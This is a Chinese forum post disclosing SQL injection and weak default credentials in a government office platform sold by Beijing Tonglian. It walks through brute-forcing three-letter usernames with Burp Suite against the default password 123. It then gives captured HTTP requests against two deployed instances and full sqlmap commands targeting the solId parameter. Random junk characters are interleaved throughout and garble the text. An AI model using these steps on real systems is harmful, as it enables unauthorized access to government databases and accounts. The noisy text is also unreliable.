|
) b$ `3 s/ I4 f& v: L E* G; A" }: K
% C0 b" Z, e+ P8 K2 N; g
' o5 Z. H+ v3 C/ Y0 e+ l! B4 P2 V
5 N5 w7 _7 Q' c+ L9 j( V1 j2 m6 g 平台简介:
& y) m3 w+ i8 ^# X6 Z
8 Y5 j5 F+ O: H* t, E, T
6 M0 ]7 K P \% b( x # ~; `; r T9 {
7 @4 U! d' \; r
$ p7 ` W* g* u* H+ e
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! H2 ^2 [8 e. Y& u) Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 \5 u- }; V; e1 [
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
/ x" ~5 [7 {! r( S 2 o- `. x" j# o9 B- R
# h# f5 H. q1 S7 `3 T) W+ o) ~6 l
' m5 J& p, f% f! u" w+ p
* I2 _) E( B' c
, r; W7 ^* T1 P4 W$ z 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
: v; U* ?$ d2 q 6 {- |: y) s* O0 I3 l# j1 ?( j
: i( ]" u' T6 Q6 q* q
( P6 I" j$ }, C2 U: r) y* U _7 J6 f5 u/ w8 v; A
5 V& e+ n/ }' Z4 S4 b* G: p7 x
http://1.1.1.1:7197/cap-aco/#(案例2-)9 D8 S% N$ d( w& n: W
$ {& D# \3 d2 d! W* r& X
* ~- ~( l( x6 p& O! Y http://www.XXOO.com (案例1-官网网站)
; M6 _" [2 ?- }1 k
& j; x" }, i1 w! F. e4 j/ [/ V# ?' m& L, C! \) } }7 k
0 C% w- }: T+ z
1 Q& w9 |- ^+ b2 }
. L, u8 S4 t& M0 _' E; D) p, E8 j 漏洞详情:
1 z8 [1 M- c Q; `* d
, i' N: M, V; b7 B) m" c/ y& B
' Z. J; g8 o- K/ \; _7 M 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试# E0 x! T, f9 q' n& ?
" j' R/ M* g7 `+ d7 B U) ^3 X
, I% Z2 v/ e/ t0 _( H 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
3 m& s% x5 N4 f1 D7 H 2 I3 f; s4 i; r1 U
" i$ c% X+ `6 X0 _6 K; t& k& i. X
2 ?- U5 L& l: v) v) S
9 p# q* z4 H% s6 g
8 H1 J$ r1 `8 w  1 S V* a1 L) ^" x6 b' I+ B
1 Z/ H" D4 P( G, p- n% G: \
j- b. b0 a U, ?: Q& H: T status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
, N, ^0 a, g) A / D; W2 N: e, Z4 m0 A! W
% t ]7 v e, U, t0 f$ d 1、案例1-官方网站7 ]' ]* Z# t7 ^8 ]% T
# R6 }+ b- l h8 j" W* r) y+ \1 K
7 `2 O5 M C* }2 b7 f1 R GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
6 u, Y8 z4 d2 \ A* z' M" s+ [
6 l4 h5 N; l- j* f& S# n7 @: o" S' p+ M& {! B7 q, e
Host: www.XXOO.com! k& Q8 A' a7 i4 W+ p/ u
/ C I# T6 L- B+ M: `! B7 n- r" s" F/ h: S# P$ ?( B
Proxy-Connection: Keep-Alive4 ~9 O2 U" }3 d) t0 h# N1 L
6 H: _8 B2 p9 Q I& k
5 S6 J+ s) }+ O% F Accept: application/json, text/javascript, */*; q=0.013 H; R @- q) a" N- b' ]- R
9 u# @- J, D$ i" N0 K& |) J$ r
( ?% Q ]9 X7 j" i3 P) M Accept-Language: zh-CN
0 C6 d9 S) h5 v) _& \- l
/ e7 ]$ g l8 g0 h1 f$ [4 x
" e$ f5 v) s6 t2 d2 U+ H3 F9 b Content-Type: application/json
* u9 D3 E T \5 i7 b# E , k' R+ r6 \( b$ c/ } T! O
' z2 o4 N( g& \2 w" @. s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
) s: ? ~( Y; M4 ]( U: s2 E
& u6 x$ J$ m7 N' s( M! Z' ]( l( x3 Y
X-Requested-With: XMLHttpRequest
! }6 o* O4 h8 D o8 a ' @: |* R/ h( L1 s6 I
! w1 |* z/ M9 ^" o
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002& F6 { e0 g$ K( \2 ^+ t; l
+ b: r& D8 l7 L& t5 P r V: d, S' g+ O6 H
Accept-Encoding: gzip, deflate, sdch
+ q. Q; N# z0 H
% f# _+ v7 Y5 H7 A' B
( T7 k9 w; q( S. {+ V Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e/ j3 v/ N. l' l: u5 F5 ^4 ^
1 n; H% W3 T y2 j
5 S7 y3 j% Z- r! r$ j 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
$ p, ]8 {1 L' e$ F M- W t + H" G1 ?: s8 s. ~
/ W& |) Y* A3 j' H& b( z  8 v- T: B. Q; T4 Z1 e" ^
; f0 Z0 y" K3 V3 k& V/ `
0 S8 y" i5 }8 t; K2 l/ p: p  : T, v% n5 X. Q& g2 G6 K
8 ]5 I7 I4 |- V$ i: c0 e
- I0 a7 P' M: p, t# z
7 A6 R- P& ^8 H
. K2 M5 q7 `2 r* A _9 j+ l7 T6 @8 H* i7 J' m
# ?% C& s! r7 k5 L 1 Q; Z: M. @3 i- l+ c
9 J t" {& B" P7 Z) V1 f % d, F0 p2 D( k
1 W/ i: Q v+ m
) j+ D. @. s$ ~4 {/ _- `
2、案例2-某天河云平台
+ y; a* D( W% ~/ |0 B4 R+ k
8 ]! @# X! g! m+ W8 e5 x, w F
7 [* n3 u E3 _0 y r( W: b GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ n, e+ Y6 i2 ` B y3 Q+ ]! k- w" b* b1 V" O
4 b9 T& f ]& F
Host: 1.1.1.:7197
P( H$ ?( @2 J, ~8 Y: h- m6 }0 O
: d6 N* Y: u& ~6 r. j7 }0 \1 j; x+ C0 y H$ k/ U5 q7 ?
Accept: application/json, text/javascript, */*; q=0.01
) F2 B* b: P9 Z
/ Y, c$ `' k9 e# i. w/ j* m0 i; [( c
+ x8 L7 n. X8 q* ^ X-Requested-With: XMLHttpRequest X0 p: e& @# s5 R# q4 }. s% j) T6 h
/ A+ Q9 c# M- a) C' ?: e$ H* _9 G Q. a! f4 a7 L1 E1 \7 K. G' o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0" ~$ J }6 f. I4 m
6 F2 o# g. j0 r3 M; w& `
, \' R& L. G1 J$ e# z Content-Type: application/json
9 P: J# r( {- z) X2 T) F, p/ S
* E$ s: ]8 u: s$ o) \: d1 y# c$ c- p0 X8 l {, ^. m5 Z
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008, h' ~- z8 ?; {9 {3 R u* i" f" s
* l- ?: A. J) J( B/ Y- f. K" V+ K% e* K" ^9 p4 J9 W& n
Accept-Language: zh-CN,zh;q=0.84 l* M/ F! i! m+ n0 ?& T9 u% u$ \
( M. |/ |; c+ U5 C6 G, V
~7 L" L, O+ y4 z. x9 p1 _
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1- c& p) g5 Y3 M0 F. B, h( S
9 b, t1 H- W+ C' k! g: w$ R
1 V0 R* M' n/ _. x1 h/ F Connection: close! ^) T7 K0 N6 A$ P. E% ]
3 e3 b% w7 c0 J1 h* ^
* }. D- J0 m! F: E 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" H& X' {5 d* c4 s# p8 n. e# [- o
) P1 ~- r+ Y" l9 [+ s: |
: t7 M) x& A& y' o3 p( G
 # I' o$ E$ y; v4 c/ V, y3 b
1 X% _1 P- q& u% h6 J# P6 N0 j
* F& U) \! s5 u" M: f
& o6 N8 B# }! s p! {7 R& J | 
发表于 2018-10-20 20:15:17
收藏
支持
反对